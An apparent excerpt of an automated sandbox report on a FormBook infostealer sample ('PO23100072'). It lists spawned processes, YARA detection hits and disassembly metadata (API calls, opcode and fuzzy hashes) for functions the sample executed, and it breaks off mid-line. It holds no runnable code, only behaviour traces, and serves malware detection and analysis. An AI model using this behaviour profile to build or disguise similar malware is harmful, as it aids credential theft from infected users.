                                                              Target ID:9
                                                              Start time:03:15:33
                                                              Start date:25/09/2024
                                                              Path:C:\Windows\SysWOW64\userinit.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\userinit.exe"
                                                              Imagebase:0xdf0000
                                                              File size:45'568 bytes
                                                              MD5 hash:24892AC6E39679E3BD3B0154DE97C53A
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low
                                                              Has exited:false

                                                              General

                                                              Target ID:10
                                                              Start time:03:15:46
                                                              Start date:25/09/2024
                                                              Path:C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe"
                                                              Imagebase:0x120000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:14
                                                              Start time:03:16:04
                                                              Start date:25/09/2024
                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                              Imagebase:0x7ff6d20e0000
                                                              File size:676'768 bytes
                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:7.1%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:38
                                                                Total number of Limit Nodes:7
                                                                execution_graph 15223 e7acf0 15224 e7acff 15223->15224 15227 e7add9 15223->15227 15232 e7ade8 15223->15232 15228 e7ae1c 15227->15228 15230 e7adf9 15227->15230 15228->15224 15229 e7b020 GetModuleHandleW 15231 e7b04d 15229->15231 15230->15228 15230->15229 15231->15224 15233 e7adf9 15232->15233 15234 e7ae1c 15232->15234 15233->15234 15235 e7b020 GetModuleHandleW 15233->15235 15234->15224 15236 e7b04d 15235->15236 15236->15224 15237 e7d6c0 DuplicateHandle 15238 e7d756 15237->15238 15239 e74668 15240 e7467a 15239->15240 15241 e74686 15240->15241 15243 e74779 15240->15243 15244 e7479d 15243->15244 15248 e74879 15244->15248 15252 e74888 15244->15252 15249 e748af 15248->15249 15250 e7498c 15249->15250 15256 e744d4 15249->15256 15254 e748af 15252->15254 15253 e7498c 15253->15253 15254->15253 15255 e744d4 CreateActCtxA 15254->15255 15255->15253 15257 e75918 CreateActCtxA 15256->15257 15259 e759db 15257->15259 15260 e7d478 15261 e7d4be GetCurrentProcess 15260->15261 15263 e7d510 GetCurrentThread 15261->15263 15265 e7d509 15261->15265 15264 e7d54d GetCurrentProcess 15263->15264 15266 e7d546 15263->15266 15269 e7d583 15264->15269 15265->15263 15266->15264 15267 e7d5ab GetCurrentThreadId 15268 e7d5dc 15267->15268 15269->15267

                                                                Executed Functions

                                                                Function 00E7D468 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00E7D4F6
                                                                • GetCurrentThread.KERNEL32 ref: 00E7D533
                                                                • GetCurrentProcess.KERNEL32 ref: 00E7D570
                                                                • GetCurrentThreadId.KERNEL32 ref: 00E7D5C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: c53d877027a33fdb357b96339ee3a12face185b4b66403c21cdc5e8b46fd3acd
                                                                • Instruction ID: d654a343a4ee3658127cb1c1ed66bea660fe67f839b4a9975b73567069759e89
                                                                • Opcode Fuzzy Hash: c53d877027a33fdb357b96339ee3a12face185b4b66403c21cdc5e8b46fd3acd
                                                                • Instruction Fuzzy Hash: C75156B0904309CFEB14DFA9D948B9EBBF1EF88318F20C459E409A72A0D774A945CF65
                                                                Function 00E7D478 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00E7D4F6
                                                                • GetCurrentThread.KERNEL32 ref: 00E7D533
                                                                • GetCurrentProcess.KERNEL32 ref: 00E7D570
                                                                • GetCurrentThreadId.KERNEL32 ref: 00E7D5C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: 590ba7253790027377a8cc1e80ced47f77eae8b9b199cda1700651d58864848f
                                                                • Instruction ID: 5f9e07f2233b8f33c45a5e571e3ef05d0c851e9fd9bfe114819a6dde7c95c0a6
                                                                • Opcode Fuzzy Hash: 590ba7253790027377a8cc1e80ced47f77eae8b9b199cda1700651d58864848f
                                                                • Instruction Fuzzy Hash: E05136B0900309CFDB14DFAAD948B9EBBF1EF88314F208459E419A7290D775A945CF65
                                                                Function 00E7ADE8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 44 e7ade8-e7adf7 45 e7ae23-e7ae27 44->45 46 e7adf9-e7ae06 call e79414 44->46 47 e7ae3b-e7ae7c 45->47 48 e7ae29-e7ae33 45->48 53 e7ae1c 46->53 54 e7ae08 46->54 55 e7ae7e-e7ae86 47->55 56 e7ae89-e7ae97 47->56 48->47 53->45 99 e7ae0e call e7b080 54->99 100 e7ae0e call e7b070 54->100 55->56 57 e7aebb-e7aebd 56->57 58 e7ae99-e7ae9e 56->58 61 e7aec0-e7aec7 57->61 62 e7aea0-e7aea7 call e7a150 58->62 63 e7aea9 58->63 59 e7ae14-e7ae16 59->53 60 e7af58-e7b018 59->60 94 e7b020-e7b04b GetModuleHandleW 60->94 95 e7b01a-e7b01d 60->95 65 e7aed4-e7aedb 61->65 66 e7aec9-e7aed1 61->66 64 e7aeab-e7aeb9 62->64 63->64 64->61 68 e7aedd-e7aee5 65->68 69 e7aee8-e7aef1 call e7a160 65->69 66->65 68->69 75 e7aef3-e7aefb 69->75 76 e7aefe-e7af03 69->76 75->76 77 e7af05-e7af0c 76->77 78 e7af21-e7af2e 76->78 77->78 80 e7af0e-e7af1e call e7a170 call e7a180 77->80 84 e7af51-e7af57 78->84 85 e7af30-e7af4e 78->85 80->78 85->84 96 e7b054-e7b068 94->96 97 e7b04d-e7b053 94->97 95->94 97->96 99->59 100->59
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00E7B03E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 7c69eeef5180094ce434d1d114ad2cf282e2014d0a67c836d5f34c37677daa10
                                                                • Instruction ID: 31e0d873934ce73215cb1e1a61bb478243f15ee3c2c387c016877c06f2d43707
                                                                • Opcode Fuzzy Hash: 7c69eeef5180094ce434d1d114ad2cf282e2014d0a67c836d5f34c37677daa10
                                                                • Instruction Fuzzy Hash: 137158B0A00B058FE724DF29D44575ABBF1FF88304F04992DE45AE7A50DB35E84ACB91
                                                                Function 00E75A84 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 101 e75a84-e75b14
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0bbbe38dda44d59963c6568ae938dd1c42e48dde693ee502bb9c437d755049a5
                                                                • Instruction ID: 88eccc2bead256ef57081285afaeda65b83800023263278ad340a9b3cfa6ed03
                                                                • Opcode Fuzzy Hash: 0bbbe38dda44d59963c6568ae938dd1c42e48dde693ee502bb9c437d755049a5
                                                                • Instruction Fuzzy Hash: C931D172804B4ACFEB11DFA8C8857EDBBB0FF85324F24915AC059AB250C7B5A946CB11
                                                                Function 00E7590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 104 e7590c-e7598c 105 e7598f-e759d9 CreateActCtxA 104->105 107 e759e2-e75a3c 105->107 108 e759db-e759e1 105->108 115 e75a3e-e75a41 107->115 116 e75a4b-e75a4f 107->116 108->107 115->116 117 e75a51-e75a5d 116->117 118 e75a60 116->118 117->118 120 e75a61 118->120 120->120
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 00E759C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: f8e9f84e3d2da3e69b045f8aeb1cd36d7c7cf43e141ac7a6654fbc58469fb55e
                                                                • Instruction ID: 660091a205a2d0db395bb57869b68f2cdd9fa1ef2b2e1361a00240bfd5975b8e
                                                                • Opcode Fuzzy Hash: f8e9f84e3d2da3e69b045f8aeb1cd36d7c7cf43e141ac7a6654fbc58469fb55e
                                                                • Instruction Fuzzy Hash: 2E41E5B1C0071ACFEB24DFA9C8857CEBBB1BF88704F20816AD418AB251DB756946CF50
                                                                Function 00E744D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 121 e744d4-e759d9 CreateActCtxA 125 e759e2-e75a3c 121->125 126 e759db-e759e1 121->126 133 e75a3e-e75a41 125->133 134 e75a4b-e75a4f 125->134 126->125 133->134 135 e75a51-e75a5d 134->135 136 e75a60 134->136 135->136 138 e75a61 136->138 138->138
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 00E759C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 531e805443d5da68f70829b71b11c10795edef3be1c78a72c5332cba671f45ce
                                                                • Instruction ID: 0ffdbefec8facb038e6cf01b95a05169a7e04707a56a846543fbd6a6eba7fd60
                                                                • Opcode Fuzzy Hash: 531e805443d5da68f70829b71b11c10795edef3be1c78a72c5332cba671f45ce
                                                                • Instruction Fuzzy Hash: 4B41D3B1C0071DCFEB24DFA9C88479EBBB5BF88704F24816AD418AB251DBB56946CF50
                                                                Function 00E7D6B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 139 e7d6b8-e7d754 DuplicateHandle 140 e7d756-e7d75c 139->140 141 e7d75d-e7d77a 139->141 140->141
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E7D747
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: bbd6593bbcb02195c5a59fdcd90f878b96a0d9de52d10e9198976d108698d3e7
                                                                • Instruction ID: 419f4014a605ef97f0202d586cfbfee18ec44cf577fa20a54349651ff787860f
                                                                • Opcode Fuzzy Hash: bbd6593bbcb02195c5a59fdcd90f878b96a0d9de52d10e9198976d108698d3e7
                                                                • Instruction Fuzzy Hash: A621E2B5900249DFDB10CFAAD984AEEBBF5FB48310F14801AE918B3250C378A955CF64
                                                                Function 00E7D6C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 144 e7d6c0-e7d754 DuplicateHandle 145 e7d756-e7d75c 144->145 146 e7d75d-e7d77a 144->146 145->146
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E7D747
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 708da9ea23f218ec2e610994fcd411c18a8921b58122eb5a770dd1a667130b55
                                                                • Instruction ID: 1dbbed564f83de3f1b1248c67edc0c05330bc1f931c731b60549d575c30ec956
                                                                • Opcode Fuzzy Hash: 708da9ea23f218ec2e610994fcd411c18a8921b58122eb5a770dd1a667130b55
                                                                • Instruction Fuzzy Hash: 7621C4B5900249DFDB10CFAAD884ADEFBF9FB48310F14841AE918A3350D378A954CF65
                                                                Function 00E7AFD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 149 e7afd8-e7b018 150 e7b020-e7b04b GetModuleHandleW 149->150 151 e7b01a-e7b01d 149->151 152 e7b054-e7b068 150->152 153 e7b04d-e7b053 150->153 151->150 153->152
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00E7B03E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 282885da9f8546ac896174907275eaf7134ca04c9b79d77d7d18b8cee292743d
                                                                • Instruction ID: c937b25f4d68363d6966d511893781f2fb084debccd0941e072fc3e85d7bb322
                                                                • Opcode Fuzzy Hash: 282885da9f8546ac896174907275eaf7134ca04c9b79d77d7d18b8cee292743d
                                                                • Instruction Fuzzy Hash: B811CDB5800249CFDB20DF9AD844BDEFBF4AB88324F14841AD529B7650D379A945CFA1
                                                                Function 00D5D3D8 Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475117606.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d5d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6352d42c8e9db30f56de66e69d854321b75d103fe2247cbee4eab2b35315b3d6
                                                                • Instruction ID: 2d58ac20a9ec0f2a4461a7b3ddf71b4a9c3e3be16d808f4027ad7202bcb43feb
                                                                • Opcode Fuzzy Hash: 6352d42c8e9db30f56de66e69d854321b75d103fe2247cbee4eab2b35315b3d6
                                                                • Instruction Fuzzy Hash: 2321F475504204DFDF14DF10D9C4B16BB66FB94326F24C169DC490B256C336E85ACAB2
                                                                Function 00D6D1D4 Relevance: .1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475199614.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d6d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f2b6123c646b7ca6801f424bc15e58c17165d644dc7447dc858b9968aca8723
                                                                • Instruction ID: 13fd5eccfeb9f1c7b584caae492c875005b1e17befdfe9337bbd35d12cdf0bb6
                                                                • Opcode Fuzzy Hash: 0f2b6123c646b7ca6801f424bc15e58c17165d644dc7447dc858b9968aca8723
                                                                • Instruction Fuzzy Hash: E921F575A04304EFDB05DF10E9D4B25BB66FB88314F24C56DD8494B296C376D846CA71
                                                                Function 00D6D01C Relevance: .1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475199614.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d6d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 443d0ef39ff78c5d270a1017057eef64ce3c5fd9acba6c921bc101e8d3b61519
                                                                • Instruction ID: 51131b75c87d93444eebebf5723605abeaeb933bfe4e1826e47364906d8a4450
                                                                • Opcode Fuzzy Hash: 443d0ef39ff78c5d270a1017057eef64ce3c5fd9acba6c921bc101e8d3b61519
                                                                • Instruction Fuzzy Hash: D521D075A04344DFDB14DF14E984B26BB66FB88314F24C569E84A4B286C33AD847CAB2
                                                                Function 00D6D005 Relevance: .1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475199614.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d6d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a76df670dba6bf0ffeccdd8b2344c0230063e4295628ec7b628d047c29b2a53
                                                                • Instruction ID: f3aea6d47bb46461ee73aa71b0eb2ea470cc2bdcff53788ad34d1f3c2aa4bf44
                                                                • Opcode Fuzzy Hash: 3a76df670dba6bf0ffeccdd8b2344c0230063e4295628ec7b628d047c29b2a53
                                                                • Instruction Fuzzy Hash: B32162755093C08FCB12CF24D994715BF72EB46314F28C5EAD8498F6A7C33A980ACB62
                                                                Function 00D5D3D3 Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475117606.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d5d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                • Instruction ID: 4becf075dbd65c77d22c55d7ca7b4cc4e114c7cfb98662036e86d0491461e18f
                                                                • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                • Instruction Fuzzy Hash: EB11CD76504240CFCF15CF00D5C0B16BF62FB94325F28C2A9DC490A256C33AE85ACBA1
                                                                Function 00D6D1CF Relevance: .1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475199614.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d6d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                • Instruction ID: 77605c5d9ce90de15bcc21b5e35ba8591f94245fc7b36217ec9702cab373a161
                                                                • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                • Instruction Fuzzy Hash: 8611DD75A04280DFCB11CF10D5D0B15FBB2FB88324F28C6ADD8494B296C33AD84ACB61
                                                                Function 00D5D745 Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475117606.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d5d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e3f256e157b30a741bae3b7773d4374dcff11b762ab82568e1c2e91afbc858fc
                                                                • Instruction ID: 6c3a3192aa6b87440c5556c2b52519a59716858af1dff5e6d9a0245cfe5e3146
                                                                • Opcode Fuzzy Hash: e3f256e157b30a741bae3b7773d4374dcff11b762ab82568e1c2e91afbc858fc
                                                                • Instruction Fuzzy Hash: 7E01F7710043449AEB305E11CC84B26BF99DF49726F18C51AED0A0A282D6799809CBB1
                                                                Function 00D5D744 Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475117606.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d5d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5151e81f3c537ce029bb05d3d2a6acaa6b027c6b16cb30ad0a0f9fea0096e22d
                                                                • Instruction ID: 3cc3a162d1cd57c25a0e0496258f36326382485639e79cb80ad4253ee29abb80
                                                                • Opcode Fuzzy Hash: 5151e81f3c537ce029bb05d3d2a6acaa6b027c6b16cb30ad0a0f9fea0096e22d
                                                                • Instruction Fuzzy Hash: 91F09071404344AEEB209E16DC88B62FFD8EB95735F18C45AED094B286D279AC48CBB1

                                                                Non-executed Functions

                                                                Function 00E7D3A4 Relevance: .3, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 41363ee3e5a4f22f654fc3e2edc75d8424ea997fbb80fee7d8d4a11c4c4ec780
                                                                • Instruction ID: 04d18d9680b425ab163bcf7e9a031cc9b20b66bab70466b46d7100c65a48c754
                                                                • Opcode Fuzzy Hash: 41363ee3e5a4f22f654fc3e2edc75d8424ea997fbb80fee7d8d4a11c4c4ec780
                                                                • Instruction Fuzzy Hash: 90A14B36E10209CFCF09DFA4C84459EB7B2FF84304B15957AE909BB262DB71E916CB90

                                                                Execution Graph

                                                                Execution Coverage:1.2%
                                                                Dynamic/Decrypted Code Coverage:5%
                                                                Signature Coverage:9.3%
                                                                Total number of Nodes:140
                                                                Total number of Limit Nodes:9
                                                                execution_graph 93077 42f543 93078 42f553 93077->93078 93079 42f559 93077->93079 93082 42e463 93079->93082 93081 42f57f 93085 42c5a3 93082->93085 93084 42e47e 93084->93081 93086 42c5bd 93085->93086 93087 42c5ce RtlAllocateHeap 93086->93087 93087->93084 93102 424613 93103 42462f 93102->93103 93104 424657 93103->93104 93105 42466b 93103->93105 93106 42c283 NtClose 93104->93106 93112 42c283 93105->93112 93108 424660 93106->93108 93109 424674 93115 42e4a3 RtlAllocateHeap 93109->93115 93111 42467f 93113 42c2a0 93112->93113 93114 42c2b1 NtClose 93113->93114 93114->93109 93115->93111 93121 4249a3 93122 4249bc 93121->93122 93123 424a04 93122->93123 93126 424a47 93122->93126 93128 424a4c 93122->93128 93129 42e383 93123->93129 93127 42e383 RtlFreeHeap 93126->93127 93127->93128 93132 42c5f3 93129->93132 93131 424a14 93133 42c610 93132->93133 93134 42c621 RtlFreeHeap 93133->93134 93134->93131 93241 42f673 93242 42f5e3 93241->93242 93243 42e463 RtlAllocateHeap 93242->93243 93244 42f640 93242->93244 93245 42f61d 93243->93245 93246 42e383 RtlFreeHeap 93245->93246 93246->93244 93247 42b873 93248 42b88d 93247->93248 93251 17e2df0 LdrInitializeThunk 93248->93251 93249 42b8b5 93251->93249 93088 413bc3 93089 413bdd 93088->93089 93094 4173a3 93089->93094 93091 413bfb 93092 413c40 93091->93092 93093 413c2f PostThreadMessageW 93091->93093 93093->93092 93096 4173c7 93094->93096 93095 4173ce 93095->93091 93096->93095 93097 4173ed 93096->93097 93101 42f923 LdrLoadDll 93096->93101 93099 417403 LdrLoadDll 93097->93099 93100 41741a 93097->93100 93099->93100 93100->93091 93101->93097 93116 41af13 93117 41af57 93116->93117 93118 41af78 93117->93118 93119 42c283 NtClose 93117->93119 93119->93118 93135 4115e3 93136 4115f8 93135->93136 93141 4138d3 93136->93141 93139 42c283 NtClose 93140 411611 93139->93140 93143 4138f9 93141->93143 93142 411604 93142->93139 93143->93142 93145 413653 LdrInitializeThunk 93143->93145 93145->93142 93146 418968 93147 42c283 NtClose 93146->93147 93148 418972 93147->93148 93149 413768 93150 41366d 93149->93150 93152 413675 93150->93152 93153 42c503 93150->93153 93154 42c520 93153->93154 93157 17e2c70 LdrInitializeThunk 93154->93157 93155 42c548 93155->93152 93157->93155 93158 401aec 93159 401aed 93158->93159 93162 42fa13 93159->93162 93160 401b5c 93160->93160 93165 42df33 93162->93165 93166 42df59 93165->93166 93177 4072f3 93166->93177 93168 42df6f 93169 42dfcb 93168->93169 93180 41ad23 93168->93180 93169->93160 93171 42df8e 93172 42dfa3 93171->93172 93195 42c643 93171->93195 93191 427f43 93172->93191 93175 42dfbd 93176 42c643 ExitProcess 93175->93176 93176->93169 93198 416053 93177->93198 93179 407300 93179->93168 93181 41ad4f 93180->93181 93216 41ac13 93181->93216 93184 41ad94 93186 41adb0 93184->93186 93189 42c283 NtClose 93184->93189 93185 41ad7c 93187 41ad87 93185->93187 93188 42c283 NtClose 93185->93188 93186->93171 93187->93171 93188->93187 93190 41ada6 93189->93190 93190->93171 93192 427fa4 93191->93192 93194 427fb1 93192->93194 93227 418213 93192->93227 93194->93175 93196 42c65d 93195->93196 93197 42c66e ExitProcess 93196->93197 93197->93172 93199 416070 93198->93199 93201 416089 93199->93201 93202 42cd03 93199->93202 93201->93179 93204 42cd1d 